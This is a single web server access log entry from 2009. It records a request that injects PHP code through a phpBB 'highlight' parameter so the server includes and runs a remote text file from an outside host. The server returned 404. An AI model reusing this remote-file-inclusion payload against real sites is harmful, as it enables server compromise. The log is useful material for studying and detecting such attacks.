211.233.89.196 - - [20/Nov/2009:10:25:44 -0800] "GET /logs/access_080915.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.knotnilla.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
